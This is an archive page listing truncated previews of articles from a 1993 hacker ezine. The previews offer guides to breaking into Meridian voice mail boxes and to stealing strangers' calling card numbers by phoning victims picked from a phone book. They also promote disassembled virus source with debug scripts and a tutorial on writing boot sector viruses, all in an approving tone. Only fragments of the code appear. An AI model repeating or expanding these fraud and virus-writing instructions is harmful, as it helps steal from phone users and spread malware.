Source's journal picture

Source

followFollow
🤴
Administrator: eZine
🕒
Created 25 Apr 2022
📄
12 Articles
The source is an ezine written by Trinity. The issue 0 (the only one I have) has been released on May 31, 1993
show more

SOURCE00.010 - Hacking Into Meridian Voice Mail Systems!

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Meridian is one of the easiest voice mail systems to hack into. You can typically get a unused box in a matter of minutes. If you don't know what a meridian system sounds like, dial (800)765-9898, and press one. This will send you to the extension called 'Express Messaging, Mailbox?'. If you hear that, then chances are, is it's a meridian system. Also try pressing two, and you'll be connected to 'Meridian Mail, Mailbox?'. If you hear that, Bingo, it's definitely a Meridian system, as the name implies. Basically, what Meridian is, is a PBX service (thus the outdials) which many companies use, because they ha...

SOURCE00.009 - Hacking Calling Cards

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Hacking Calling Cards By Morrissey/Trinity Yo Folks. Here's a little file on how to hack a persons calling card number. Anyone can do it. It just takes a little practice. Here's what ya need. A phone. A phone book (preferably out-of-state, but any will do). Recommended: A computer nearby (for those nice typing effects). Something that makes a 'beep' sound. It also helps to do this on a conference, but it can be done anywhere. Step One: Choosing a Victim Pick a name out of the phone book. Choose one that has only 10-15 entries. Don't bother with Jones or Smith. This is also a great way to get back at enemies. You c...

SOURCE00.008 - Programming Tricks

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
There are many possible tricks, but I won't get into all of them. The one thing that you really need to know, is that all debuggers won't call interrupt 8, and only debuggers call interrupts 1 and 3. Using this knowledge, you should be able to come up with some interesting solutions to your problem of people trying to get your source code. Take this code for example: mov ax,3521h ; Get the INT 21h address int 21h ; Do it! push es ; Move the extra segment to the pop ds ; Data segment xchg bx, dx ; Set up the INT 21h address mov ax, 2503h ; This will make INT 21h = INT 3 int 21h ; Do it! It's one that I prefer to use. Anybody wh...

SOURCE00.007 - Picky, Picky, Picky!

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Were have been ALOT of people confusing viruses, with worms. It's one of my BIGGEST pet peeves, besides from confusing sympathy with empathy (As all of my friends know), so I'm going to educate those who do not know. First the sympathy - empathy relationship. Empathy adj. ('em-pä-thà): a capacity for participating in the feelings or ideas of another. Sympathy arj. (Sim-pä-thà): a relationship between persons or things wherein whatever affects one similarly affects the others. the ability to enter into and share in the feelings and interests of another. Now on to the more related subjects of this matter. John McAffee, yes, the ...

SOURCE00.006 - The Devils Dance Virus [Source/Debug Script]

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Ok, Here we have the disassembly and debug script of the Devil's Dance virus. I did NOT feel like boring myself by commenting this virus, as I wanted to get The SOURCE out. Albeit, I did use Sourcer (tm), so there are some comments already here. This virus traps interrupts 21h and 09h. [--- Cut Here -----------------------------------------------------------------] data_1e equ 417h data_2e equ 450h data_3e equ 1 ;* data_4e equ 0 ;* data_5e equ 2 ;* data_6e equ 4 ;* data_7e equ 6 ;* data_8e equ 8 ;* data_9e equ 15h ;* data_10e equ 20h ;* data_11e equ 103h ;* data_12e equ 0 data_13e equ 2 data_14e equ 6 data_15e equ 15h data_16e equ 20h...

SOURCE00.005 - The 405 Virus [Source/Debug Script]

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Here is an example of a stealth virus. It tries to hide itself from being detected by use of restoring date/time and attributes. It also moves across drives, which is not that hard to do, but you don't find a substantial amount of viruses which do that. Some of the coding is interesting, as this is not a very well optimized virus, but never-the-less, it does do it's job, and is fairly small (398 Bytes). [--- Cut Here -----------------------------------------------------------------] data_1e equ 9Eh data_10e equ 295h ;* data_11e equ 297h ;* data_13e equ 0E000h ;* data_15e equ 0E195h ;* seg_a segment byte public assume cs:seg_a,...

SOURCE00.004 - The Hydra8 Virus [Source/Debug Script]

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Well, another Source Code/Debug Script pair. The Hydra8 Virus isn't a very exciting virus. It merely changes the video mode, and then displays the message 'Copyright (c) 1991 C.A.V.E.', and then infects some files. Oh yeah! So exciting, but at least it can be interesting to study. [--- Cut Here -----------------------------------------------------------------] ;€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€ ;€€ €€ ;€€ HYDRA8 €€ ;€€ €€ ;€€ Disassembly by: -=>Wasp<=- aka >>Night Crawler<< €€ ;€€ €€ ;€€ Reassemble with TASM 2.0 €€ ;€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€...

SOURCE00.003 - The Cancer Virus [Source/Debug Script]

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
While I was writing this magazine, I decided to disassemble and comment the Cancer virus to brush up on my disassembly skills. Unlike 40Hex Issue 10, which has begun phasing out debug scripts, as they feel that source code is more useful. Although I agree with that theory, we feel that using BOTH the source code, and the debug script to give out to people will suit both those who are experienced, and those who are not. Well, here it is: [--- Cut Here -----------------------------------------------------------------] code segment byte public assume cs:code, ds:code org 100h ; Disassembly By Havoc The Chaos/Trinity cancer proc far start...

SOURCE00.002 - Boot Sector Viruses Explained

eZine's profile picture
eZine lover (@eZine)
Published in 
 · 25 Apr 2022
Boot Sector Virii Made Easy by: Havoc The Chaos Since Dark Angel has made his PHUNKY virus writting guides, but has yet to include boot sector viruses, I decided to take his lead. If you don't know assembly well, or have never written a virus, don't start with boot sector viruses, as you might just confuse yourself. I would suggest taking a serious look at Dark Angel's virus writting guides, as I could not do a better job explaining them. If you already know COM, EXE, SYS, and/or TSR viruses, then welcome to the next step of virus writing. The basic overview is: Load new INT 13h handler into memory. Load Partition Table f...
loading
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT